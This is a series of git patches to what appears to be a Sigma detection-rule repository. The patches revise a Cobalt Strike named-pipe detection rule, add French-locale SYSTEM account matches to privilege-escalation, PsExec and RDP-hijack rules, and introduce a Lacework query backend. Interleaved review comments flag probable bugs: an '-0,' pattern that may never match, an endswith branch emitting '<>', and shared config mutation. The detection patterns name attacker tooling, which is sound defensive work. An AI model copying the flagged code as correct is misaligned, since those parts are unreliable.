Subject: [PATCH 0592/1367] remove becasue of possible conflict with a legitimate tool (https://labs.nettitude.com/blog/cve-2017-16245-cve-2017-16246-avecto-defendpoint-multiple-vulnerabilities/)
---
 .../pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml | 1 -
 1 file changed, 1 deletion(-)
diff --git a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml
index 07e196d8..b82fae6d 100644
--- a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml
+++ b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml
@@ -33,7 +33,6 @@ detection:
 - PipeName:
 - '\demoagent_11'
 - '\demoagent_22'
- - '\PGMessagePipe'
 condition: selection_malleable_profiles
 falsepositives:
 - Chrome instances using the exactly same name pipe named mojo.something
From 644397e65cd19999c7fbb7e2aa8d5ed90fd6207e Mon Sep 17 00:00:00 2001
From: mlp1515 <69857628+mlp1515@users.noreply.github.com>
Date: Thu, 26 Aug 2021 12:41:36 +0000
Subject: [PATCH 0593/1367] Update win_exploit_cve_2019_1388.yml French language settings
---
 rules/windows/process_creation/win_exploit_cve_2019_1388.yml | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/rules/windows/process_creation/win_exploit_cve_2019_1388.yml b/rules/windows/process_creation/win_exploit_cve_2019_1388.yml
index c93f2113..096c1994 100644
--- a/rules/windows/process_creation/win_exploit_cve_2019_1388.yml
+++ b/rules/windows/process_creation/win_exploit_cve_2019_1388.yml
@@ -7,6 +7,7 @@ references:
 - https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege
 author: Florian Roth
 date: 2019/11/20
+modified: 2021/08/26
 tags:
 - attack.privilege_escalation
 - attack.t1068
@@ -21,7 +22,9 @@ detection:
 rights1:
 IntegrityLevel: 'System' # for Sysmon users
 rights2:
- User: 'NT AUTHORITY\SYSTEM' # for non-Sysmon users - English language settings
+ User|startswith:
+ - 'NT AUTHORITY\SYSTEM' # for non-Sysmon users - English language settings
+ - 'AUTORITE NT\Sys' # French language settings
 condition: selection and ( rights1 or rights2 )
 falsepositives:
 - Unknown
From 7ad927f28eeb307d2f0a6b0dc48ab5f8a68926fe Mon Sep 17 00:00:00 2001
From: mlp1515 <69857628+mlp1515@users.noreply.github.com>
Date: Thu, 26 Aug 2021 12:42:47 +0000
Subject: [PATCH 0594/1367] Update win_wmiprvse_spawning_process.yml French language settings
---
 .../process_creation/win_wmiprvse_spawning_process.yml | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)
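Review bot: `'AUTORITE NT\Sys'` is a prefix rather than the full localized account name, and the rule does not say why; presumably the truncation sidesteps the accented spelling of the full French name, and a comment such as `# prefix on purpose: avoids the accented spelling of the localized SYSTEM account` would prevent someone from "completing" it later. Switching the English entry from an exact `User:` match to `User|startswith:` also widens it to any account name that begins with `NT AUTHORITY\SYSTEM`; harmless, but it is a semantic change that the commit message does not mention. The same edit is repeated in the wmiprvse, whoami_as_system, taskmgr, schtask, debug-privilege, always-install-elevated, tscon and psexec hunks that follow; other localizations of the SYSTEM account remain unmatched, so one documented, shared list would be easier to keep consistent than eight hand-copied pairs.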
diff --git a/rules/windows/process_creation/win_wmiprvse_spawning_process.yml b/rules/windows/process_creation/win_wmiprvse_spawning_process.yml
index e0da3a8c..d3e6843f 100644
--- a/rules/windows/process_creation/win_wmiprvse_spawning_process.yml
+++ b/rules/windows/process_creation/win_wmiprvse_spawning_process.yml
@@ -3,7 +3,7 @@ id: d21374ff-f574-44a7-9998-4a8c8bf33d7d
 description: Detects wmiprvse spawning processes
 status: experimental
 date: 2019/08/15
-modified: 2021/02/24
+modified: 2021/08/26
 author: Roberto Rodriguez @Cyb3rWard0g
 references:
 - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190810201010.html
@@ -23,7 +23,9 @@ detection:
 - SubjectLogonId:
 - '0x3e7' # LUID 999 for SYSTEM
 - 'null' # too many false positives
- - User: 'NT AUTHORITY\SYSTEM' # if we don't have LogonId data, fallback on username detection
+ - User|startswith:
+ - 'NT AUTHORITY\SYSTEM' # if we don't have LogonId data, fallback on username detection
+ - 'AUTORITE NT\Sys' # French language settings
 - Image|endswith:
 - '\WmiPrvSE.exe'
 - '\WerFault.exe'
From 5545403a9bea797684912b8d5709c78f2284e888 Mon Sep 17 00:00:00 2001
From: mlp1515 <69857628+mlp1515@users.noreply.github.com>
Date: Thu, 26 Aug 2021 12:43:33 +0000
Subject: [PATCH 0595/1367] Update win_whoami_as_system.yml French language settings
---
 rules/windows/process_creation/win_whoami_as_system.yml | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/rules/windows/process_creation/win_whoami_as_system.yml b/rules/windows/process_creation/win_whoami_as_system.yml
index 4fee1a9e..cdfa30d2 100644
--- a/rules/windows/process_creation/win_whoami_as_system.yml
+++ b/rules/windows/process_creation/win_whoami_as_system.yml
@@ -6,7 +6,7 @@ references:
 - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment
 author: Teymur Kheirkhabarov
 date: 2019/10/23
-modified: 2019/11/11
+modified: 2021/08/26
 tags:
 - attack.privilege_escalation
 - attack.discovery
@@ -16,7 +16,9 @@ logsource:
 product: windows
 detection:
 selection:
- User: 'NT AUTHORITY\SYSTEM'
+ User|startswith:
+ - 'NT AUTHORITY\SYSTEM'
+ - 'AUTORITE NT\Sys' # French language settings
 Image|endswith: '\whoami.exe'
 condition: selection
 falsepositives:
From 5f419d6f3524f8cfb9f2766be64a973034754555 Mon Sep 17 00:00:00 2001
From: mlp1515 <69857628+mlp1515@users.noreply.github.com>
Date: Thu, 26 Aug 2021 12:44:35 +0000
Subject: [PATCH 0596/1367] Update win_susp_taskmgr_localsystem.yml French language settings
---
 .../process_creation/win_susp_taskmgr_localsystem.yml | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/rules/windows/process_creation/win_susp_taskmgr_localsystem.yml b/rules/windows/process_creation/win_susp_taskmgr_localsystem.yml
index 4ac61fed..2ec58e2c 100644
--- a/rules/windows/process_creation/win_susp_taskmgr_localsystem.yml
+++ b/rules/windows/process_creation/win_susp_taskmgr_localsystem.yml
@@ -7,12 +7,15 @@ tags:
 - attack.t1036
 author: Florian Roth
 date: 2018/03/18
+modified: 2021/08/26
 logsource:
 category: process_creation
 product: windows
 detection:
 selection:
- User: NT AUTHORITY\SYSTEM
+ User|startswith:
+ - 'NT AUTHORITY\SYSTEM'
+ - 'AUTORITE NT\Sys' # French language settings
 Image|endswith: '\taskmgr.exe'
 condition: selection
 falsepositives:
From a31422db74d961235a78d03752912e80e49016c6 Mon Sep 17 00:00:00 2001
From: mlp1515 <69857628+mlp1515@users.noreply.github.com>
Date: Thu, 26 Aug 2021 12:45:24 +0000
Subject: [PATCH 0597/1367] Update win_susp_schtask_creation.yml French language settings
---
 rules/windows/process_creation/win_susp_schtask_creation.yml | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/rules/windows/process_creation/win_susp_schtask_creation.yml b/rules/windows/process_creation/win_susp_schtask_creation.yml
index 1647d2f5..bc671f4c 100644
--- a/rules/windows/process_creation/win_susp_schtask_creation.yml
+++ b/rules/windows/process_creation/win_susp_schtask_creation.yml
@@ -4,6 +4,7 @@ status: experimental
 description: Detects the creation of scheduled tasks in user session
 author: Florian Roth
 date: 2019/01/16
+modified: 2021/08/26
 logsource:
 category: process_creation
 product: windows
@@ -12,7 +13,9 @@ detection:
 Image|endswith: '\schtasks.exe'
 CommandLine|contains: ' /create '
 filter:
- User: NT AUTHORITY\SYSTEM
+ User|startswith:
+ - 'NT AUTHORITY\SYSTEM'
+ - 'AUTORITE NT\Sys' # French language settings
 condition: selection and not filter
 fields:
 - CommandLine
From 4f49f03460e2e92d5482b3d4e8600c756c8e3bb1 Mon Sep 17 00:00:00 2001
From: mlp1515 <69857628+mlp1515@users.noreply.github.com>
Date: Thu, 26 Aug 2021 12:46:15 +0000
Subject: [PATCH 0598/1367] Update sysmon_abusing_debug_privilege.yml French language settings
---
 .../process_creation/sysmon_abusing_debug_privilege.yml | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/rules/windows/process_creation/sysmon_abusing_debug_privilege.yml b/rules/windows/process_creation/sysmon_abusing_debug_privilege.yml
index 399103d2..041bba07 100644
--- a/rules/windows/process_creation/sysmon_abusing_debug_privilege.yml
+++ b/rules/windows/process_creation/sysmon_abusing_debug_privilege.yml
@@ -28,7 +28,9 @@ detection:
 - '\powershell.exe'
 - '\cmd.exe'
 selection3:
- User: 'NT AUTHORITY\SYSTEM'
+ User|startswith:
+ - 'NT AUTHORITY\SYSTEM'
+ - 'AUTORITE NT\Sys' # French language settings
 filter:
 CommandLine|contains|all:
 - ' route '
From e9ed5f592cbda58f771b167471fbf2b71018f985 Mon Sep 17 00:00:00 2001
From: mlp1515 <69857628+mlp1515@users.noreply.github.com>
Date: Thu, 26 Aug 2021 12:48:59 +0000
Subject: [PATCH 0599/1367] Update sysmon_always_install_elevated_windows_installer.yml French language settings
---
 .../sysmon_always_install_elevated_windows_installer.yml | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/rules/windows/process_creation/sysmon_always_install_elevated_windows_installer.yml b/rules/windows/process_creation/sysmon_always_install_elevated_windows_installer.yml
index 8d89e217..4aa3afd0 100644
--- a/rules/windows/process_creation/sysmon_always_install_elevated_windows_installer.yml
+++ b/rules/windows/process_creation/sysmon_always_install_elevated_windows_installer.yml
@@ -4,6 +4,7 @@ description: This rule will looks for Windows Installer service (msiexec.exe) wh
 status: experimental
 author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community
 date: 2020/10/13
+modified: 2021/08/26
 references:
 - https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg
 tags:
@@ -16,7 +17,9 @@ detection:
 integrity_level:
 IntegrityLevel: 'System'
 user:
- User: 'NT AUTHORITY\SYSTEM'
+ User|startswith:
+ - 'NT AUTHORITY\SYSTEM'
+ - 'AUTORITE NT\Sys' # French language settings
 image_1:
 Image|contains|all:
 - '\Windows\Installer\'
@@ -34,4 +37,4 @@ fields:
 falsepositives:
 - System administrator Usage
 - Penetration test
-level: medium
\ No newline at end of file
+level: medium
From e1aa82b412457c154fe9a5db3a8fb1b6ee4cdf67 Mon Sep 17 00:00:00 2001
From: mlp1515 <69857628+mlp1515@users.noreply.github.com>
Date: Thu, 26 Aug 2021 12:50:24 +0000
Subject: [PATCH 0600/1367] Update win_susp_tscon_localsystem.yml French language settings
---
 .../windows/process_creation/win_susp_tscon_localsystem.yml | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/rules/windows/process_creation/win_susp_tscon_localsystem.yml b/rules/windows/process_creation/win_susp_tscon_localsystem.yml
index b11145b6..d04687d1 100644
--- a/rules/windows/process_creation/win_susp_tscon_localsystem.yml
+++ b/rules/windows/process_creation/win_susp_tscon_localsystem.yml
@@ -7,6 +7,7 @@ references: - https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6 author: Florian Roth date: 2018/03/17 +modified: 2021/08/26 tags: - attack.command_and_control - attack.t1219 @@ -15,7 +16,9 @@ logsource: product: windows detection: selection: - User: NT AUTHORITY\SYSTEM + User|startswith: + - 'NT AUTHORITY\SYSTEM' + - 'AUTORITE NT\Sys' # French language settings Image|endswith: '\tscon.exe' condition: selection falsepositives: From cce7cfc79af8e7667e8a0a25d2d7f44e43be890e Mon Sep 17 00:00:00 2001 From: mlp1515 <69857628+mlp1515@users.noreply.github.com> Date: Thu, 26 Aug 2021 12:51:45 +0000 Subject: [PATCH 0601/1367] Update win_tool_psexec.yml French language settings --- rules/windows/other/win_tool_psexec.yml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/rules/windows/other/win_tool_psexec.yml b/rules/windows/other/win_tool_psexec.yml index 22a4d3da..250429d1 100644 --- a/rules/windows/other/win_tool_psexec.yml +++ b/rules/windows/other/win_tool_psexec.yml @@ -5,7 +5,7 @@ status: experimental description: Detects PsExec service installation and execution events (service and Sysmon) author: Thomas Patzke date: 2017/06/12 -modified: 2021/08/06 +modified: 2021/08/26 references: - https://www.jpcert.or.jp/english/pub/sr/ir_research.html - https://jpcertcc.github.io/ToolAnalysisResultSheet @@ -46,7 +46,9 @@ logsource: detection: sysmon_processcreation: Image|endswith: '\PSEXESVC.exe' - User: 'NT AUTHORITY\SYSTEM' + User|startswith: + - 'NT AUTHORITY\SYSTEM' + - 'AUTORITE NT\Sys' # French language settings --- logsource: category: pipe_created From e59b8e1e3efca77ca5d09032da72538cf90a7862 Mon Sep 17 00:00:00 2001 
From: phantinuss Date: Thu, 26 Aug 2021 14:53:20 +0200 Subject: [PATCH 0602/1367] add applicable pipe names from regex rule --- ...sysmon_susp_cobaltstrike_pipe_patterns.yml | 31 ++++++++++++++++--- 1 file changed, 26 insertions(+), 5 deletions(-) diff --git a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml index b82fae6d..9ee3bbae 100644 --- a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml +++ b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml @@ -23,17 +23,38 @@ detection: - '\mojo.5688.8052.35780273329370473' - '\mypipe-f' - '\mypipe-h' - - '\ntsvcs_' - - '\scerpc_' + - '\ntsvcs' + - '\scerpc' - '\win_svc' - - '\spoolss_' + - '\spoolss' - '\msrpc_' - '\win\msrpc_' - - '\wkssvc_' + - '\wkssvc' + - '\f53f' + - '\windows.update.manager' + - '\SearchTextHarvester' + - '\DserNamePipe' + - '\PGMessagePipe' + - '\MsFteWds' + - '\f4c3' + - '\fullduplex_' + - '\rpc_' - PipeName: - '\demoagent_11' - '\demoagent_22' - condition: selection_malleable_profiles + selection_malleable_profile_CatalogChangeListener: + PipeName|startswith: '\Winsock2\CatalogChangeListener-' + PipeName|endswith: '-0,' + filter: + PipeName: + - '\wkssvc' + - '\spoolss' + - '\scerpc' + - '\ntsvcs' + - '\SearchTextHarvester' + - '\PGMessagePipe' + - '\MsFteWds' + condition: 1 of selection_malleable_profile* and not filter falsepositives: - Chrome instances using the exactly same name pipe named mojo.something level: high From a5d175fbf7e1564dc1e77d97192bfddcd4058b91 Mon Sep 17 00:00:00 2001 From: David Hazekamp Date: Thu, 26 Aug 2021 14:05:44 -0500 Subject: [PATCH 0603/1367] feat(backend): introducing lacework backend --- tools/sigma/backends/lacework.py | 615 +++++++++++++++++++++++++++++++ 1 file changed, 615 insertions(+) create mode 100644 tools/sigma/backends/lacework.py 
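Review bot: `PipeName|endswith: '-0,'` in the new selection_malleable_profile_CatalogChangeListener block carries a trailing comma that looks unintentional; if the pipe name actually ends in `-0`, this selection can never match and `1 of selection_malleable_profile*` silently falls back to the first selection alone. Suggest `PipeName|endswith: '-0'` and a test event exercising this pattern. The added prefixes `'\rpc_'` and `'\fullduplex_'` are considerably broader than the rest of the list; if they have known benign matches, the falsepositives section (which still names only the Chrome mojo pipe) should mention them.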
diff --git a/tools/sigma/backends/lacework.py b/tools/sigma/backends/lacework.py new file mode 100644 index 00000000..fb7dcece --- /dev/null +++ b/tools/sigma/backends/lacework.py 
@@ -0,0 +1,615 @@ +# Output backends for sigmac +# Copyright 2021 Lacework, Inc. +# Author: + +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU Lesser General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. + +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU Lesser General Public License for more details. + +# You should have received a copy of the GNU Lesser General Public License +# along with this program. If not, see . + +import json +import re +import textwrap +import yaml + +from sigma.backends.base import SingleTextQueryBackend +from sigma.backends.exceptions import BackendError +from sigma.parser.modifiers.base import SigmaTypeModifier + + +LACEWORK_CONFIG = yaml.load( + # TODO: build this out to support all the default aws sigma rules + textwrap.dedent(''' + --- + version: 0.1 + services: + cloudtrail: + evaluatorId: Cloudtrail + source: CloudTrailRawEvents + fieldMap: + - sigmaField: eventName + laceworkField: EVENT_NAME + matchType: exact + continue: false + - sigmaField: eventSource + laceworkField: EVENT_SOURCE + matchType: exact + continue: false + - sigmaField: errorCode + laceworkField: ERROR_CODE + matchType: exact + continue: false + - sigmaField: "^(.*)$" + laceworkField: EVENT:$1 + matchType: regex + continue: true + - sigmaField: "^(.*?)\\\\.type$" + laceworkField: '$1."type"' + matchType: regex + continue: true + returns: + - INSERT_ID + - INSERT_TIME + - EVENT_TIME + - EVENT + alertProfile: LW_CloudTrail_Alerts + '''), + Loader=yaml.SafeLoader +) + + +def safe_get(obj, name, inst): + """ + Sweet helper for getting objects + """ + try: + assert isinstance(obj[name], inst) + value = obj[name] + except Exception: + value = inst() + + return value + + 
+def get_output_format(config): + return ( + 'json' + if ( + safe_get(config, 'json', bool) + or safe_get(config, 'JSON', bool) + ) + else 'yaml' + ) + + +# YAML Tools +def str_presenter(dumper, data): + if len(data.splitlines()) > 1: # check for multiline string + return dumper.represent_scalar('tag:yaml.org,2002:str', data, style='|') + return dumper.represent_scalar('tag:yaml.org,2002:str', data) + + +yaml.add_representer(str, str_presenter) + + +class LaceworkBackend(SingleTextQueryBackend): + """ + Converts Sigma rule into Lacework Policy Platform + """ + identifier = "lacework" + active = True + # our approach to config will be such that we support both an + # embedded or specified config. + config_required = False + + andToken = ' and ' + orToken = ' or ' + notToken = 'not ' + subExpression = '(%s)' + listExpression = 'in (%s)' + listSeparator = ', ' + valueExpression = "'%s'" + nullExpression = '%s is null' + notNullExpression = '%s is not null' + mapExpression = '%s = %s' + mapListsSpecialHandling = True + mapListValueExpression = '%s %s' + + def generate(self, sigmaparser): + """ + Method is called for each sigma rule and receives the parsed rule (SigmaParser) + """ + # 1. get embedded config global + config = LACEWORK_CONFIG + + # 2. overlay backend options + config.update(self.backend_options) + + # 3. set a class instance variable for sigma fields + self.laceworkSigmaFields = LaceworkQuery.get_fields(sigmaparser) + + # 4. set a class instance variable for lacework field mapping + self.laceworkFieldMap = LaceworkQuery.get_field_map(LACEWORK_CONFIG, sigmaparser) + + # 5. 
get output format + output_format = get_output_format(config) + + # determine if we're generating query/policy/both + result = '' + if LaceworkQuery.should_generate_query(config): + query = LaceworkQuery( + config, sigmaparser, self, output_format=output_format) + result += str(query) + if LaceworkPolicy.should_generate_policy(config): + policy = LaceworkPolicy( + config, sigmaparser, output_format=output_format) + + # if we're in json mode and have already generated a query + # add a newline before emitting policy + if result and output_format == 'json': + result += '\n' + + result += str(policy) + + return result + + def generateValueNode(self, node): + """ + Value Expression for Lacework Query Language (LQL) + + If value is a field name + 1. Do not wrap in valueExpression + 2. Transfrom using fieldNameMapping() + """ + node = self.cleanValue(str(node)) + + if node in self.laceworkSigmaFields: + return self.fieldNameMapping(node, None) + return self.valueExpression % node + + def generateMapItemNode(self, node): + """ + Map Expression for Lacework Query Language (LQL) + + Special handling for contains by inspecting value for wildcards + """ + fieldname, value = node + + transformed_fieldname = self.fieldNameMapping(fieldname, value) + + # is not null + if value == '*': + return f'{transformed_fieldname} is not null' + # contains + if ( + isinstance(value, str) + and value.startswith('*') + and value.endswith('*') + ): + value = self.generateValueNode(value[1:-1]) + return f"contains({transformed_fieldname}, {value})" + # startswith + if ( + isinstance(value, str) + and value.endswith('*') # a wildcard at the end signifies startswith + ): + value = self.generateValueNode(value[:-1]) + return f"starts_with({transformed_fieldname}, {value})" + # endswith + if ( + isinstance(value, str) + and value.startswith('*') # a wildcard at the start signifies endswith + ): + new_value = self.generateValueNode(value[1:]) + if new_value != (self.valueExpression % value[1:]): + 
raise BackendError( + 'Lacework backend only supports endswith for literal string values') + return f"{transformed_fieldname} <> {new_value}" + if ( + self.mapListsSpecialHandling is False and isinstance(value, (str, int, list)) + or self.mapListsSpecialHandling is True and isinstance(value, (str, int)) + ): + return self.mapExpression % (transformed_fieldname, self.generateNode(value)) + elif type(value) == list: + return self.generateMapItemListNode(transformed_fieldname, value) + elif value is None: + return self.nullExpression % (transformed_fieldname, ) + else: + raise TypeError( + f'Lacework backend does not support map values of type {type(value)}') + + def fieldNameMapping(self, fieldname, value): + """ + Field Name Mapping for Lacework Query Language (LQL) + + The Lacework backend is not using a traditional config. + As such we map field names here using our custom backend config. + """ + if not (isinstance(fieldname, str) and fieldname): + return fieldname + + for map in self.laceworkFieldMap: + if not isinstance(map, dict): + continue + + sigma_field = safe_get(map, 'sigmaField', str) + if not sigma_field: + continue + + lacework_field = safe_get(map, 'laceworkField', str) + if not lacework_field: + continue + + continyu = safe_get(map, 'continue', bool) + + # exact + if ( + map.get('matchType') == 'exact' + and sigma_field == fieldname + ): + fieldname = lacework_field + if not continyu: + return fieldname + + # startswith + if ( + map.get('matchType') == 'startswith' + and fieldname.startswith(sigma_field) + ): + fieldname = f'{lacework_field}{fieldname[len(sigma_field):]}' + if not continyu: + return fieldname + + # regex + if map.get('matchType') == 'regex': + fieldname_re = re.compile(sigma_field) + fieldname_match = fieldname_re.match(fieldname) + + if not fieldname_match: + continue + + for i, group in enumerate(fieldname_match.groups(), start=1): + if group is None: + continue + fieldname = lacework_field.replace(f'${i}', group) + + if not 
continyu: + return fieldname + + return fieldname + + +class LaceworkQuery: + def __init__( + self, + config, + sigmaparser, + backend, + output_format='yaml' + ): + rule = sigmaparser.parsedyaml + conditions = sigmaparser.condparsed + + # 0. Get Output Format + self.output_format = str(output_format).lower() + + # 1. Get Service + self.service_name = self.get_service(rule) + + # 2. Get Service Config + self.service_config = self.get_service_config( + config, self.service_name) + + # 3. Get Evaluator ID + self.evaluator_id = self.get_evaluator_id( + self.service_name, self.service_config) + + # 4. Get Query ID + self.title, self.query_id = self.get_query_id(rule) + + # 5. Get Query Source + self.query_source = self.get_query_source( + self.service_name, self.service_config) + + # 6. Get Query Returns + self.returns = self.get_query_returns( + self.service_name, self.service_config) + + # 7. Get Query Text + self.query_text = self.get_query_text(backend, conditions) + + def get_query_text(self, backend, conditions): + query_template = ( + '{id} {{\n' + ' {source_block}\n' + ' {filter}\n' + ' {return_block}\n' + '}}' + ) + + # 1. get_query_source_block + source_block = self.get_query_source_block() + + # 2. get_query_filters + filter_block = self.get_query_filter_block(backend, conditions) + + # 3. 
get_query_returns + return_block = self.get_query_return_block() + + return query_template.format( + id=self.query_id, + source_block=source_block, + filter=filter_block, + return_block=return_block + ) + + def get_query_source_block(self): + source_block_template = ( + 'source {{\n' + ' {source}\n' + ' }}' + ) + return source_block_template.format( + source=self.query_source + ) + + def get_query_return_block(self): + return_block_template = ( + 'return distinct {{\n' + '{returns}\n' + ' }}' + ) + return return_block_template.format( + returns=',\n'.join(f' {r}' for r in self.returns) + ) + + def __iter__(self): + for key, attr in { + 'evaluatorId': 'evaluator_id', + 'queryId': 'query_id', + 'queryText': 'query_text' + }.items(): + yield (key, getattr(self, attr)) + + def __str__(self): + o = dict(self) + + if self.output_format == 'json': + return json.dumps(o, indent=4) + + return yaml.dump( + o, + explicit_start=True, + default_flow_style=False, + sort_keys=False + ) + + @staticmethod + def get_fields(sigmaparser): + return safe_get(sigmaparser.parsedyaml, 'fields', list) + + @staticmethod + def get_field_map(config, sigmaparser): + config = safe_get(config, 'services', dict) + service = LaceworkQuery.get_service(sigmaparser.parsedyaml) + service_config = safe_get(config, service, dict) + + return safe_get(service_config, 'fieldMap', list) + + @staticmethod + def should_generate_query(backend_options): + # if we are explictly requesting a query + if ( + 'query' in backend_options + and backend_options['query'] is True + ): + return True + # if we are explicitly requesting a policy + if ( + 'policy' in backend_options + and backend_options['policy'] is True + ): + return False + # we're not being explicit about anything + return True + + @staticmethod + def get_service(rule): + logsource = safe_get(rule, 'logsource', dict) + return logsource.get('service') or 'unknown' + + @staticmethod + def get_service_config(config, service): + config = safe_get(config, 
'services', dict) + service_config = safe_get(config, service, dict) + + # 1. validate logsource service + if not service_config: + raise BackendError( + f'Service {service} is not supported by the Lacework backend') + + return service_config + + @staticmethod + def get_evaluator_id(service_name, service_config): + # 3. validate service has an evaluatorId mapping + evaluator_id = safe_get(service_config, 'evaluatorId', str) + + if not evaluator_id: + raise BackendError( + f'Lacework backend could not determine evaluatorId for service {service_name}') + + return evaluator_id + + @staticmethod + def get_query_id(rule): + title = safe_get(rule, 'title', str) or 'Unknown' + # TODO: might need to replace additional non-word characters + query_id = f'Sigma_{title}'.replace(" ", "_").replace("/", "_Or_") + + return title, query_id + + @staticmethod + def get_query_source(service_name, service_config): + # 4. validate service has a source mapping + source = safe_get(service_config, 'source', str) + + if not source: + raise BackendError( + f'Lacework backend could not determine source for service {service_name}') + + return source + + @staticmethod + def get_query_returns(service_name, service_config): + returns = safe_get(service_config, 'returns', list) + + if not returns: + raise BackendError( + f'Lacework backend could not determine returns for service {service_name}') + + return returns + + @staticmethod + def get_query_filter_block(backend, conditions): + filter_block_template = ( + 'filter {{\n' + ' {filter}\n' + ' }}' + ) + + for parsed in conditions: + query = backend.generateQuery(parsed) + before = backend.generateBefore(parsed) + after = backend.generateAfter(parsed) + + filter = "" + if before is not None: + filter = before + if query is not None: + filter += query + if after is not None: + filter += after + + return filter_block_template.format(filter=filter) + + +class LaceworkPolicy: + def __init__( + self, + config, + sigmaparser, + output_format='yaml' + 
): + rule = sigmaparser.parsedyaml + + # 0. Get Output Format + self.output_format = str(output_format).lower() + + # 1. Get Service Name + self.service_name = LaceworkQuery.get_service(rule) + + # 2. Get Service Config + self.service_config = LaceworkQuery.get_service_config( + config, self.service_name) + + # 3. Get Evaluator Id + self.evaluator_id = LaceworkQuery.get_evaluator_id( + self.service_name, self.service_config) + + # 4. Get Title + # 5. Get Query ID + self.title, self.query_id = LaceworkQuery.get_query_id(rule) + + # 6. Get Enabled + self.enabled = False + + # 7. Get Policy Type + self.policy_type = 'Violation' + + # 8. Get Alert Enabled + self.alert_enabled = False + + # 9. Get Alert Profile + self.alert_profile = self.get_alert_profile( + self.service_name, self.service_config) + + # 10. Get Eval Frequency + self.eval_frequency = 'Hourly' + + # 11. Get Limit + self.limit = 1000 + + # 12. Get Severity + self.severity = safe_get(rule, 'level', str) or 'medium' + + # 13. Get Description + self.description = safe_get(rule, 'description', str) + + # 14. 
Get Remediation + self.remediation = "" + + def __iter__(self): + for key, attr in { + 'evaluatorId': 'evaluator_id', + 'title': 'title', + 'enabled': 'enabled', + 'policyType': 'policy_type', + 'alertEnabled': 'alert_enabled', + 'alertProfile': 'alert_profile', + 'evalFrequency': 'eval_frequency', + 'queryId': 'query_id', + 'limit': 'limit', + 'severity': 'severity', + 'description': 'description', + 'remediation': 'remediation' + }.items(): + yield (key, getattr(self, attr)) + + def __str__(self): + o = dict(self) + + if self.output_format == 'json': + return json.dumps(o, indent=4) + + return yaml.dump( + o, + explicit_start=True, + default_flow_style=False, + sort_keys=False + ) + + @staticmethod + def should_generate_policy(backend_options): + # if we are explictly requesting a query + if ( + 'policy' in backend_options + and backend_options['policy'] is True + ): + return True + # if we are explicitly requesting a policy + if ( + 'query' in backend_options + and backend_options['query'] is True + ): + return False + # we're not being explicit about anything + return True + + @staticmethod + def get_alert_profile(service_name, service_config): + alert_profile = safe_get(service_config, 'alertProfile', str) + + if not alert_profile: + raise BackendError( + f'Lacework backend could not determine alert profile for service {service_name}') + + return alert_profile From cc6e4381b2192ec5f355b3c1600a6dbb082d25a0 Mon Sep 17 00:00:00 2001 From: David Hazekamp Date: Thu, 26 Aug 2021 14:12:47 -0500 Subject: [PATCH 0604/1367] feat(backend): introducing lacework backend Adding authors Removing todo --- tools/sigma/backends/lacework.py | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/tools/sigma/backends/lacework.py b/tools/sigma/backends/lacework.py index fb7dcece..2f567088 100644 --- a/tools/sigma/backends/lacework.py +++ b/tools/sigma/backends/lacework.py 
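Review bot: `config.update(self.backend_options)` in `generate` mutates the module-level `LACEWORK_CONFIG` dict in place, so options passed for one rule leak into every later rule converted in the same process (and into `get_field_map`, which reads `LACEWORK_CONFIG` directly); take a copy first, `config = dict(LACEWORK_CONFIG)`. In the endswith branch of `generateMapItemNode`, `return f"{transformed_fieldname} <> {new_value}"` emits what reads as a not-equal operator for a suffix match — unless `<>` is LQL's suffix operator, the generated filter silently inverts the intended detection. `safe_get` relies on `assert isinstance(obj[name], inst)` for its type check, which is stripped under `python -O` and then lets a wrongly typed value through; spell it `if not isinstance(obj[name], inst): raise TypeError(name)`. In `get_query_filter_block` the `return filter_block_template.format(...)` appears to sit inside `for parsed in conditions`, so only the first parsed condition ever reaches the query text.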
